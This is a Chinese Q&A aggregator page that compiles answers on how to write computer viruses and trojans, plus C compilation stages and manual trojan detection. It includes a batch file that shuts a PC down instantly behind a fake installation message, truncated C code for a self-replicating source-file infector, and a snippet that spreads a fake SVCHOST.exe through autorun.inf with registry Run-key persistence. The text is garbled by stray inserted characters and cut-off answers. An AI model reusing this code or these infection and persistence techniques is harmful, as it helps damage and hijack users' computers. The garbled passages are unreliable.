简述病毒文件的编译过程

A. 电脑病毒是怎么编写的

电脑病毒是我们大家都不陌生的，你们也肯定很好奇电脑病毒是什么编写的，下面是我为大家整理的相关的内容，希望对大家有帮助!

如何制作电脑病毒方法一：

计算机病毒是编写或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。

方法/步骤

1.计算机病毒的特征是传播性，非授权性，隐藏性，潜伏性，破坏性，不可预见性，可触发性。计算机病毒根据感染方式可以分为感染可执行文件的病毒，感染引导区的病毒，感染文档文件的病毒。

2.计算机病毒根据感染方式可以分为感染可执行文件的病毒，感染引导区的病毒，感染文档文件的病毒。

3.现阶段的反病毒技术有特征码扫描，启发式扫描，虚乱洞段拟机技术，主动防御技术，自免疫技术，云杀毒等等。

4.一个简单病毒的模块包含，触发模块，传播模块，表现模块。

5.学习计算机病毒，要了解硬盘结构，计算机扇区结构，计算机系统启动过程，文件系统，计算机引导过程。

6.汇编语言和C语言用的会比较多。

注意事项

一个是要理解计算机系统，文件格式。

一个是要精通编程，汇编和C。

计算机病毒的编写方法二：

1.打开电脑左下角开始----所有程序----启动，右键点击启动选择属性单击左键。

2.查找下文件位置，找到启动所在文件夹。就可以进行下一步了。

3.打开启动这个文件，复制下文件路径。win7的启动文件家保存的是这个路径，XP的不是这个可以自己实验下。保存下备用

4新建一个记事本，写上如下代码保存。其中shutdown -s -t 0表示0秒后关机，代码的意思是把这个代码写到启动这个文件夹下面。

5.图中标记的代码就是刚才复制的路径，原理跟以前写过的自动关机代码差不多，只是自动关机时间调为0了。

电脑病毒的特点：

计算机病毒不但本身具有破坏性，更有害的是具有传染性，一旦病毒被复制或产生变种，其速度之快令人难以预防。

传染性是病毒的基本特征。

在生物界，病毒通过传染从一个生物体扩散到另一个生物体。在适当的条件下，它可得到大量繁殖，并使被感染的生物体表现出病症甚至死亡。同样，计算机病毒也会通过各种渠道从已被感染的计算机扩散到未被感染的计算机，在某些情况下造成被感染的计算机工作失常甚至瘫痪。与生物病毒不同的是，计算机病毒是一段人为编制的计算机程序代码，这段程序代码一旦进入计算机并得以执行，它就会搜寻其他符合其传染条件的程序或存储介质，确定目标后再将自身代码插入其中，达到自我繁殖的目的。

只要一台计算机染毒，如不及时处理，那么病毒会在这台电脑上迅速扩散，计算机病毒可通过各种可能的渠道，如软盘、计算机网络去传染其他的计算机。当您在一台机器上发现了病毒时，往往曾在这台计算机上用过的软盘已感染上了病毒，而与这台机器相联网的其他计算机也许也被该病毒染上了。是否具有传染性是判别一个程序是否为计算机病毒的最重要条件。

潜伏性

有些病毒像定时炸弹一样，让它什么时间发作是预先设计好颤锋的。比如黑色星期五病毒，哗誉不到预定时间一点都觉察不出来，等到条件具备的时候一下子就爆炸开来，对系统进行破坏。一个编制精巧的计算机病毒程序，进入系统之后一般不会马上发作，因此病毒可以静静地躲在磁盘或磁带里呆上几天，甚至几年，一旦时机成熟，得到运行机会，就又要四处繁殖、扩散，继续为害。潜伏性的第二种表现是指，计算机病毒的内部往往有一种触发机制，不满足触发条件时，计算机病毒除了传染外不做什么破坏。触发条件一旦得到满足，有的在屏幕上显示信息、图形或特殊标识，有的则执行破坏系统的操作，如格式化磁盘、删除磁盘文件、对数据文件做加密、封锁键盘以及使系统死锁等。

隐蔽性

计算机病毒具有很强的隐蔽性，有的可以通过病毒软件检查出来，有的根本就查不出来，有的时隐时现、变化无常，这类病毒处理起来通常很困难。

破坏性

计算机中毒后，可能会导致正常的程序无法运行，把计算机内的文件删除或受到不同程度的损坏 。通常表现为：增、删、改、移。

可触发性

病毒因某个事件或数值的出现，诱使病毒实施感染或进行攻击的特性称为可触发性。为了隐蔽自己，病毒必须潜伏，少做动作。如果完全不动，一直潜伏的话，病毒既不能感染也不能进行破坏，便失去了杀伤力。病毒既要隐蔽又要维持杀伤力，它必须具有可触发性。病毒的触发机制就是用来控制感染和破坏动作的频率的。病毒具有预定的触发条件，这些条件可能是时间、日期、文件类型或某些特定数据等。病毒运行时，触发机制检查预定条件是否满足，如果满足，启动感染或破坏动作，使病毒进行感染或攻击;如果不满足，使病毒继续潜伏。

B. 电脑病毒编写步骤

计算机病毒是编写或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。下面由我给你做出详细的电脑病银纤毒编写介绍！希望对你有帮助！

7现阶段也有一些简单病毒制造机，此类软件可以在网上找到。

注意事项：

一个是要理解计算机系统，文件格式。

C. 病毒如何编译的

前阵子的熊猫病毒,是引用国外早些时候最牛的一个蠕虫病毒的原代码,相当于换汤不换药,直接给他在换一种代码就可以利用了,也就是人们说的变种病毒,病毒变种的速度很快,每个会编程的都会制作出很多的变种.好比,一个小偷每天在换衣服做案逃避警察一样
编写程序的编写员一般都经过了C语言,C++等一些高级语言程序的学习编写
熊猫烧香的制造者是,一个计算机职业技术学校的一名学生
自己编写程序时,一般不会中毒~即使不小心中了,也没事,因为他就是这个病毒的程序编写员,好比医生知道怎么样可以治好自己的病

D. 怎么编写病毒程序

问题一：如何编写程序病毒？ 那首先要对系统底层的东西比较熟悉，如果编网络病毒，还要对网络协议很了解。并且要精通至少一门编程语言，一般写病毒用a *** （汇编语言）的比较多，用其他也可以，比如vbs（vb脚本语言）或者.bat的海处理，都可以。如果写unix 类系统的病毒用c语言的多一些。但汇编知识是写高级病毒必须的知识。

问题二：如何写一个简单的病毒程序? 前些天学病毒这门技术着实吃了很多苦头，走了很多弯路，尽管按我的知识水平，病毒已经是水到渠成的学习内容了。但是我现在学了入门才发现这门技术实际上隐藏着很多玄机，包含着许多技术，不专门学习研究根本无法达到“牛”的境界上去。如今写了这篇文章，介绍的都是相当实用的东西，可以让你少走许多弯路（有时侯一个错误够你找几个小时的）。不过需要些基础知识才能看懂。假如你有天知识储备够了，不学学病毒将是你的遗憾。另，由于是写给协会会员参考的，也没写的多“专业”，多了些赘述。
在你看之前，你应该知道这只是篇可以带你入门的文章，如果你已经会了就不用看了。看的时候最好准备个PE表在旁边。写病毒程序可以使用很多种语言来写比如C,汇编，甚至有人用Dephi这样可视化编程工具都能写出来。但是最适合写病毒程序的还是汇编语言。汇编语言底层，灵活，速度快，体积小的优势能将一个病毒程序发挥到极至，通常一个程序写出来才几千字节就包含了所有的功能。一般一个病毒都有如下几个功能：
一 代码重定位
二 自己找到所需API地址
三 搜索文件、目录
四 感染文件
五 破坏系统或文件（随便你了）
其中一，二项功能是必要的，五项功能是可选的。而一个病毒程序感染文件的功能是它的核心，是衡量它质量的重要标准。
（一）代码的重定位
一个变量或函数其实是一个内存地址，在编译好后，程序中的指令通过变量或函数的内存地址再去存取他们，这个地址是个绝对地址。如果你将代码插入到其他任何地方，再通埋悔过原来编译时产生的地址去找他们就找不到了，因为他们已经搬家了。但是，你在写程序时考虑到这个问题，你就可以在代码最开始，放上几行代码取物族得程序基地址，以后变量和函数作为偏移地址，显式的加上这个基地址就能顺利找到了，这就是重定位。就象这段代码。
Call getbaseaddress
Getbaseaddress:pop ebx
Sub ebx,offset getbaseaddress
Mov eax,dword ptr [ebx+Var1]
如果你使用宏汇编语言写病毒，请尽量使用ebx做基地址指针，不要使用ebp，因为ebp在调用带参数的函数时会改变。
(二)自己取得所需的API地址
一个win32程序文件，所调用的API函数地址，是由系统填入到程序文件中描述各类数据位置的数据结构中的。而病毒作为一个残废是享受不到这个待遇的。因为你在把病毒的代码插入目标程序时没有把这些描述数据存放位置的数据结构信息也弄进去。它 *** 入到其他目标程序后就成了只有代码的残废儿童：（所以作为一个残废儿童，应当自力更生。自己搜寻自己需要的API地址。目标程序文件就包含了我们需要的东西，我们需要自己去找。目标程序文件只要还是win32程序，它的地址空间中就包含的有Kernel32.dll。如果找到了它，我们就能找到其他任何的东东。第一步，搜寻kernel32.dll的基地址。当然了，整个地址空间有4GB,可供搜索的用户进程空间也有2GB。在2GB中搜索，太吓人了。总不能在执行被感染的目标程序时，先让用户喝杯茶吧？或者斗斗地主？这里有两个技巧向大家介绍。
在程序被加载后，加载程序会调用程序的主线程的第一条指令的位置。它使用的指令是CALL，就是说，你程序还没执行，堆栈弯蚂正区里就有了一个返回地址了，这个返回地址指向的是加载程序，而加载程序是包含在KERNEL32.dll中的，我们顺着它向上找，就能找到kernel32.dll的基地址了。当然也不是一个字节一个字节的挨者找，而是一个页面一个页面地找。因为win3......>>

问题三：怎么用C语言写个简单病毒，给个代码过程 首先声明：
本程序是我举的一个例子
为了叫大家理解就可以了
如果大家拿去捉弄人，我不负任何责任！
希望大家要以学习为重！
对于病毒我们应该是深恶痛绝的，但是作为纯研究许多人还是很有兴趣的
我曾经用汇编做过一些具有毁灭性的病毒，本想献出来与大家分享
不过考虑到一些小人看了会做出来一些危害别人的行为，所以我决定
用这个简单的并毫无伤害性的c语言伪病毒来说明一下问题，
再次声明这一切全是为了编程研究！！！
病毒的特点：
病毒的最大特点就是自我复制，从病毒的分类来说有很多种，这里我们将介绍最流行的附加式
病毒，它通过对正常的文件进行改写，增加来实现其自我复制的目的。
从程序的角度来说，我们要做的事情有两件：
1，让程序能够将自己在不影响其它程序本身工作的情况下复制给其它程序，
使它具备继续复制的能力。
2，在一定条件下使其产生某种发作效果。
其实第一件事情实际上可以看成对文件进行复制，把病毒源文件的功能函数全部放到被感染
文件的最后，同时在被感染文件中调用这个函数
下面给出c语言的实现过程：
1，主程序调用病毒功能函数
2，病毒功能函数读取查找同目录下所有c文件；
3，找到一个（被感染c文件)，打开它，并且将此文件全部读取到数组变量；
4，重新创建一个同名文件（被感染c文件）
5，数组变量写回这个被感染c文件，同时将病毒源文件所需要的头文件，病毒功能函数
调用语句写入；
6，打开病毒源文件，将病毒功能函数全部写到被感染c文件的最后；
这样一个简单的c语言伪病毒virus.c就完成了
运行程序后其内容变化另保存为after_virus.c
此时，如果我们将1.c文件用A盘复制到其他机器或者Email给别人，结果
他们一运行又感染了他们保存1.c文件目录下所有c文件
对于第二件事情-------“发作效果”，这里只用printf语句警告了一下，当然你
完全可以写一个TSR驻留函数
其实，这个程序勉强可以叫做病毒
根本不算是真正的病毒，好了就说这么多，
代码如下：
#include
#include
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus=virus.c;
char buf[50][80];
char *p;
char *end=return;
char *bracket=};
char *main=main;
char *include[2]={stdio.h,dir.h};
char *int_virus=int virus();
char *buffer;
int done,i,j=0,flag=0;
printf(\nI have a virus. Writen by PuBin\n);
done = findfirst(*.c,&ffblk,0);
while (!done)
{
i=0;
if ((in = fope......>>

问题四：病毒一般用什么语言编写的？ 由于现在大多数的所谓的黑客都没有真正的技术，他们的木马都是利用别人编写的木马生成程序生成的，只要一点就好了！~~现在流行的木马有VB、E语言、pascal（注意Delphy不是一门语言，而是pascal语言的编辑器，就像C++跟VC++之间的关系）等，大量用他们编写的原因并不是他们有多好，只不过是他们简单易学！所以只要你有技术，用什么程序写不重要，条条大路通罗马！

问题五：怎样编写简单，对系统无害的病毒文件? 双击这个文件后就会关机，无毒无害。
这是代码：
@echo off
cd/
shutdown -s -t 0 -c Loading Installation,Please Wait...
那个0是打开这个文件后多少秒关机（0就是立即关机，10就是打开文件10秒后关机）， 引号中的字（Loading Installation,Please Wait...）可以随意更改（只是引号里面的，别把引号给删了）。

问题六：怎样编写病毒 3.1.1病毒程序VIRUS.C
这是一个用C语言写的病毒程序，当激发病毒程序时显示时间，然后返回。病毒程序VIRUS.C可将病毒传染给一个C语言程序。当被病毒感染的程序经编译、连接和执行后，又可以将病毒部分传染给其他的C语言源程序。每执行一次带有病毒的C语言程序，就向C语言源程序传播一次病毒。此程序的设计思路如下：
当含有病毒部分的程序被执行时，首先进入病毒程序。它在磁盘上找扩展名为C的匹配文件，如果找到，查找是否有被传染过的标志“INFECTED”。如果有此标志，继续找其它的C文件，直至全部检查一遍。若没有这个标志，则
（1）在未被感染的C程序头部加入“INFECTED”已被传染标志。
（2）读取病毒文件的头文件，将其插入到即将被感染的文件头部。如果发现有重复则不插入。
（3）在主程序中插入“VIRUSES（）；”调用VIRUSES函数。寻找printf、for、while、break语句，如果找到就在之前插入。
（4）在文件尾部插入VIRUSES_SUB子程序。
（5）在插入到将感染文件里面的VIRUSES_SUB子程序里面，必须把文件名改为当前自身的文件名，否则被传染后的文件经过编译、连接和运行后不能再继续传染。
（6）最后插入VIRUSES子程序。这个子程序里面调用了VIRUSES_SUB，执行到这里返回执行结果信息。
其中用到4个出错的返回值，分别是：
1：用户文件太大，不传染；
2：带病毒文件打不开，不传染；
3：带病毒文件读取不成功，不传染；
4：查找第一个匹配文件不成功。
如果返回值是0代表文件传染成功。
具体实现过程如下：
其中用到的函数和结构体用法参考3.3节。
首先导入病毒子程序要用到的三个库文件，分别是dir.h, stido.h, dos.h.在主函数里面只调用VIRUSES函数。紧跟定义VIRUSES函数里面要调用的VIURS_SUB函数。里面定义了若干个变量。ffblk用来保存查找到的匹配文件的信息，用到里面的ff_name变量来保存匹配文件名。
然后定义保存未感染的文件和病毒文件的文件型指针变量，分别用是*virus_r和*virus_v.读取文件的缓冲区，放到二维数组a[500][80]里面临时存放。因为此程序对大于500行的C文件不进行传染，所以完全可以放到里面。首先用getdate函数获取系统当前日期并输出。接着用findfirst函数查找扩展名为C的文件，将其信息保存到ffblk里面。用fgets函数读文件的第一行，长度是80-1个字符。然后用strstr函数检测病毒的标志，看文件是否有INFECT这个标志。
如果有，表示文件已经被传染，关闭文件，不进行传染。当含有病毒部分的程序被执行时，首先进入病毒程序。它在磁盘上查找*.C的匹配文件，一旦找到，查找“已被传染过”的标志INFECTED。若有此标志，继续找其它*.C文件，直至全部检查一遍。
如果没有这个标志，将文件全部读入a[500][80]，如果发现文件超过500行，不传染，返回。将文件指针指向文件头，打开带病毒的文件。如果打不开，返回。
然后读取带病毒文件的前4行，也就是病毒子程序要用到的头文件，写入将被传染的文件。若不能读取带病毒文件，返回。用n_line变量控制行数，把将被传染文件的源程序写回原文件。其中要进行处理不写入病毒文件已有的包含语句，也就是说使＃Include语句不重复。
这点是这样实现的：定义一个字符数组char include_h[]=; strstr函数查看将被传染文件的头文件是否和*include_h[]相同，如果相同，......>>

问题七：怎么用C语言编写木马.病毒等程序 嘿嘿给你个类病毒C程序源码，看下方法吧 #define SVCHOST_NUM 6
#include
#include
char *autorun={[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\mand=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\mand=SVCHOST.exe\nshellexecute=SVCHOST.exe};
char *files_autorun[10]={c:\\autorun.inf,d:\\autorun.inf,e:\\autorun.inf};
char *files_svchost[SVCHOST_NUM+1]={c:\\windows\\system\\MSMOUSE.DLL,
c:\\windows\\system\\SVCHOST.exe,c:\\windows\\SVCHOST.exe,
c:\\SVCHOST.exe,d:\\SVCHOST.exe,e:\\SVCHOST.exe,SVCHOST.exe};
char *regadd=reg add \HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\ /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f;
int (char *infile,char *outfile)
{
FILE *input,*output;
char temp;
if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,rb))!=NULL) && ((output=fopen
(outfile,wb))!=NULL))
{
while(!feof(input))
{
fread(&temp,1,1,input);
fwrite(&temp,1,1,output);
}
fclose(input);
fclose(output);
return 0;
......>>

问题八：怎么编辑木马病毒程序 很高兴为您解答：
制作并且传播木马都是违法行为，况且在你制作的时候可能会有人利用这漏洞对你的电脑产生危害，到时候就得不偿失拉
建议下其他腾讯电脑管家，开启所有防护，避免有人利用病毒或是木马来危害新的电脑以及帐号的全全
1、腾讯电脑管家独有的二代反病毒引擎，防护查杀更彻底
2、腾讯电脑管家拥有全球最大的云库平台，能更好的识别诈骗、钓鱼网站
3、腾讯电脑管家独创鹰眼模式，时刻保护您的爱机不受侵害
4、腾讯电脑管家独有的安全等级，您可以时刻查看你爱机的安全状态
5、新增广告过滤功能，有效减轻广告骚扰。
祝楼主祝您工作、生活愉快！！

问题九：病毒的编写是用的什么原理? 在计算机领域中，它是一种基于远程控制的黑客工具，具有隐蔽性和非授权性的特点。
所谓隐蔽性是指木马的设计者为了防止木马被发现，会采用多种手段隐藏木马，这样服务端即使发现感染了木马，由于不能确定其具 *** 置，往往只能望“马”兴叹。
所谓非授权性是指一旦控制端与服务端连接后，控制端将享有服务端的大部分操作权限，包括修改文件，修改注册表，控制鼠标，键盘等等，而这些权力并不是服务端赋予的，而是通过木马程序窃取的。
从木马的发展来看，基本上可以分为两个阶段。
最初网络还处于以UNIX平台为主的时期，木马就产生了，当时的木马程序的功能相对简单，往往是将一段程序嵌入到系统文件中，用跳转指令来执行一些木马的功能，在这个时期木马的设计者和使用者大都是些技术人员，必须具备相当的网络和编程知识。
而后随着WINDOWS平台的日益普及，一些基于图形操作的木马程序出现了，用户界面的改善，使使用者不用懂太多的专业知识就可以熟练的操作木马，相对的木马入侵事件也频繁出现，而且由于这个时期木马的功能已日趋完善，因此对服务端的破坏也更大了。
所以所木马发展到今天，已经无所不用其极，一旦被木马控制，你的电脑将毫无秘密可言。
二、木马原理
[编辑本段]
鉴于木马的巨大危害性，我们将分原理篇，防御与反击篇，资料篇三部分来详细介绍木马，希望大家对特洛伊木马这种攻击手段有一个透彻的了解。
【一、基础知识 】
在介绍木马的原理之前有一些木马构成的基础知识我们要事先加以说明,因为下面有很多地方会提到这些内容。
一个完整的木马系统由硬件部分，软件部分和具体连接部分组成。
(1)硬件部分：建立木马连接所必须的硬件实体。 控制端：对服务端进行远程控制的一方。 服务端：被控制端远程控制的一方。 INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。
(2)软件部分：实现远程控制所必须的软件程序。 控制端程序：控制端用以远程控制服务端的程序。 木马程序：潜入服务端内部，获取其操作权限的程序。 木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。
(3)具体连接部分：通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。 控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马 程序。
用木马这种黑客工具进行网络入侵，从过程上看大致可分为六步(具体可见下图)，下面我们就按这六步来详细阐述木马的攻击原理。
一.配置木马
一般来说一个设计成熟的木马都有木马配置程序，从具体的配置内容看，主要是为了实现以下两方 面功能：
(1)木马伪装：木马配置程序为了在服务端尽可能的好的隐藏木马，会采用多种伪装手段，如修改图标 ，捆绑文件，定制端口，自我销毁等，我们将在“传播木马”这一节中详细介绍。
(2)信息反馈：木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址，IRC号 ，ICO号等等，具体的我们将在“信息反馈”这一节中详细介绍。
【二、传播木马】.
(1)传播方式:
木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载，一些非正规的网站以提供软件下载为名义， 将木马捆绑在软件安装程序上，下载后，只要一运行这些程序，木马就会自动安装。
(2)伪装方......>>

问题十：有源代码,怎样编写病毒程序？ 您好：
建议您不要编写或使用病毒程序，病毒程序会对您的电脑造成损害的，如果您曾使用过此类不安全的病毒程序的话，为了您电脑的安全，建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧，打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以，您可以点击这里下载最新版的腾讯电脑管家：最新版腾讯电脑管家下载
腾讯电脑管家企业平台：./c/guanjia/

E. 如何编译病毒

你这个磨陆问题提得有点过早，你先学好凯薯编程是怎么样的瞎孙顷，在学怎样编病毒。或者到黑客基地下载个攻击工具，自己慢慢琢磨吧

F. C语言文件的编译与执行的四个阶段并分别描述

开发C程序有四个步骤：编辑、编译、连接和运行。

任何一个体系结构处理器上都可以使用C语言程序，只要该体系结构处理器有相应的C语言编译器和库，那么C源代码就可以编译并连接到目标二进制文件上运行。

1、预处理：导入源程序并保存（C文件）。

2、编译：将源程序转换为目标文件（Obj文件）。

3、链接：将目标文件生成为可执行文件（EXE文件）。

4、运行：执行，获取运行结果的EXE文件。

(6)简述病毒文件的编译过程扩展阅读：

将C语言代码分为程序的几个阶段：

1、首先，源代码文件测试。以及相关的头文件，比如stdio。H、由预处理器CPP预处理为．I文件。预编译的。文件不包含任何宏定义，因为所有宏都已展开，并且包含的文件已插入。我归档。

2、编译过程是对预处理文件进行词法分析、语法分析、语义分析和优化，生成相应的汇编代码文件。这个过程往往是整个程序的核心部分，也是最复杂的部分之一。

3、汇编程序不直接输出可执行文件，而是输出目标文件。汇编程序可以调用LD来生成可以运行的可执行程序。也就是说，您需要链接大量的文件才能获得“a.out”，即最终的可执行文件。

4、在链接过程中，需要重新调整其他目标文件中定义的函数调用指令，而其他目标文件中定义的变量也存在同样的问题。

G. 计算机病毒和木马的工作原理和过程（好的追加200）

“木马”程序是目前比较流行的病毒文件，与一般的病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种者电脑的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种者的电脑。“木马”与计算机网络中常常要用到的远程控制软件有些相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性；“木马”则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是“毫无价值”的。

一个完整的“木马”程序包含了两部分：“服务器”和“控制器”。植入被种者电脑的是“服务器”部分，而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。运行了木马程序的“服务器”以后，被种者的电脑就会有一个或几个端口被打开，使黑客可以利用这些打开的端口进入电脑系统，安全和个人隐私也就全无保障了！
病毒是附着于程序或文件中的一段计算机代码，它可在计算机之间传播。它一边传播一边感染计算机。病毒可损坏软件、硬件和文件。

病毒 (n.)：以自我复制为明确目的编写的代码。病毒附着于宿主程序，然后试图在计算机之间传播。它可能损坏硬件、软件和信息。

与人体病毒按严重性分类（从 Ebola 病毒到普通的流感病毒）一样，计算机病毒也有轻重之分，轻者仅产生一些干扰，重者彻底摧毁设备。令人欣慰的是，在没有人员操作的情况下，真正的病毒不会传播。必须通过某个人共享文件和发送电子邮件来将它一起移动。

“木马”全称是“特洛伊木马(TrojanHorse)”，原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上，“特洛伊木马”指一些程序设计人员(或居心不良的马夫)在其可从网络上下载(Download)的应用程序或游戏外挂、或网页中，包含了可以控制用户的计算机系统或通过邮件盗取用户信息的恶意程序，可能造成用户的系统被破坏、信息丢失甚至令系统瘫痪。

一、木马的特性

特洛伊木马属于客户/服务模式。它分为两大部分，既客户端和服务端。其原理是一台主机提供服务(服务器端)，另一台主机接受服务(客户端)，作为服务器的主机一般会打开一个默认的端口进行监听。如果有客户机向服务器的这一端口提出连接请求，服务器上的相应程序就会自动运行，来答应客户机的请求。这个程序被称为进程。

木马一般以寻找后门、窃取密码为主。统计表明，现在木马在病毒中所占的比例已经超过了四分之一，而在近年涌起的病毒潮中，木马类病毒占绝对优势，并将在未来的若干年内愈演愈烈。木马是一类特殊的病毒，如果不小心把它当成一个软件来使用，该木马就会被“种”到电脑上，以后上网时，电脑控制权就完全交给了“黑客”，他便能通过跟踪击键输入等方式，窃取密码、信用卡号码等机密资料，而且还可以对电脑进行跟踪监视、控制、查看、修改资料等操作。

二、木马发作特性

在使用计算机的过程中如果您发现:计算机反应速度发生了明显变化，硬盘在不停地读写,鼠标不听使唤,键盘无效,自己的一些窗口在被关闭，新的窗口被莫名其妙地打开，网络传输指示灯一直在闪烁，没有运行大的程序，而系统却越来越慢，系统资源站用很多，或运行了某个程序没有反映(此类程序一般不大，从十几k到几百k都有)或在关闭某个程序时防火墙探测到有邮件发出……这些不正常现象表明:您的计算机中了木马病毒。

三、木马的工作原理以及手动查杀介绍

由于大多玩家对安全问题了解不多，所以并不知道自己的计算机中了“木马”该怎么样清除。因此最关键的还是要知道“木马”的工作原理，这样就会很容易发现“木马”。相信你看了这篇文章之后，就会成为一名查杀“木马”的高手了。(如果成不了高手建议大家用皮筋打斑竹家玻璃，嘿嘿)

“木马”程序会想尽一切办法隐藏自己，主要途径有：在任务栏中隐藏自己，这是最基本的只要把Form的Visible属性设为False。ShowInTaskBar设为False，程序运行时就不会出现在任务栏中了。在任务管理器中隐形：将程序设为“系统服务”可以很轻松地伪装自己。

A、启动组类(就是机器启动时运行的文件组)

当然木马也会悄无声息地启动，你当然不会指望用户每次启动后点击“木马”图标来运行服务端，(没有人会这么傻吧？？)。“木马”会在每次用户启动时自动装载服务端，Windows系统启动时自动加载应用程序的方法，“木马”都会用上，如：启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。通过win.ini和system.ini来加载木马。在Windows系统中，win.ini和system.ini这两个系统配置文件都存放在C:windows目录下，你可以直接用记事本打开。可以通过修改win.ini文件中windows节的“load=file.exe，run=file.exe”语句来达到木马自动加载的目的。此外在system.ini中的boot节，正常的情况下是“Shell=Explorer.exe”(Windows系统的图形界面命令解释器)。下面具体谈谈“木马”是怎样自动加载的。

1、在win.ini文件中，在[WINDOWS]下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如“AOLTrojan木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件。

通过c:windowswininit.ini文件。很多木马程序在这里做一些小动作，这种方法往往是在文件的安装过程中被使用，程序安装完成之后文件就立即执行，与此同时安装的原文件被Windows删除干净，因此隐蔽性非常强，例如在wininit.ini中如果Rename节有如下内容:NUL=c:windowspicture.exe，该语句将c:windowspicture.exe发往NUL,这就意味着原来的文件pictrue.exe已经被删除，因此它运行起来就格外隐蔽。

2、在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell=explorer.exe程序名”，那么后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。

win.ini、system.ini文件可以通过“开始”菜单里的“运行”来查看。只要在“运行”对话框中输入“msconfig”,后点击“确定”按钮就行了。(这里大家一定要注意，如果你对计算机不是很了解，请不要输入此命令或删除里边的文件，否则一切后果和损失自己负责。斑竹和本人不承担任何责任。)

3、对于下面所列的文件也要勤加检查，木马们也可能隐藏在

C：\windows\winstart.bat和C:\windows\winnint.ini，还有Autoexec.bat

B、注册表(注册表就是注册表，懂电脑的人一看就知道了)

1、从菜单中加载。如果自动加载的文件是直接通过在Windows菜单上自定义添加的，一般都会放在主菜单的“开始->程序->启动”处，在Win98资源管理器里的位置是“C:windowsstartmenuprograms启动”处。通过这种方式使文件自动加载时，一般都会将其存放在注册表中下述4个位置上：

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserS!hellFolders

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\UserShellFolders

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellFolders

2、在注册表中的情况最复杂，在点击至：“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE，这里切记：有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“AcidBatteryv1.0木马”，它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的Explorer键值改为Explorer=“C:\WINDOWS\expiorer.exe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序，如：“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\＊＊＊＊\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能，最好的办法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名，再在整个注册表中搜索即可。

3、此外在注册表中的HKEY_CLASSES_ROOT\exefile\shell\open\command=

“1”“*”处，如果其中的“1”被修改为木马，那么每次启动一个该可执行文件时木马就会启动一次，例如着名的冰河木马就是将TXT文件的Notepad.exe改成!了它自己的启动文件，每次打开记事本时就会自动启动冰河木马，做得非常隐蔽。

注册表可以通过在“运行”对话框中输入“regedit”来查看。需要说明的是，对系统注册表进行删除修改操作前一定要将注册表备份，因为对注册表操作有一定的危险性，加上木马的隐藏较隐蔽，可能会有一些误操作，如果发现错误，可以将备份的注册表文件导入到系统中进行恢复。(次命令同样很危险，如不懂计算机请不要尝试。切记)

C、端口(端口，其实就是网络数据通过操作系统进入计算机的入口)

1、万变不离其宗，木马启动都有一个方式，它只是在一个特定的情况下启动。所以平常多注意你的端口。一般的木马默认端口有

BO31337，YAL1999，Deep2140，Throat3150，冰河7636，Sub71243

那么如何查看本机开放哪些端口呢？

在dos里输入以下命令：netstat-an,就能看到自己的端口了，一般网络常用端口有：21,23,25,53,80,110,139，如果你的端口还有其他的，你可要注意了，因为现在有许多木马可以自己设定端口。(上面这些木马的端口是以前的，由于时间和安全的关系现在好多新木马的端口我不知道，也不敢去试，因为技术更新的太快了，我跟不上了。55555555555555)

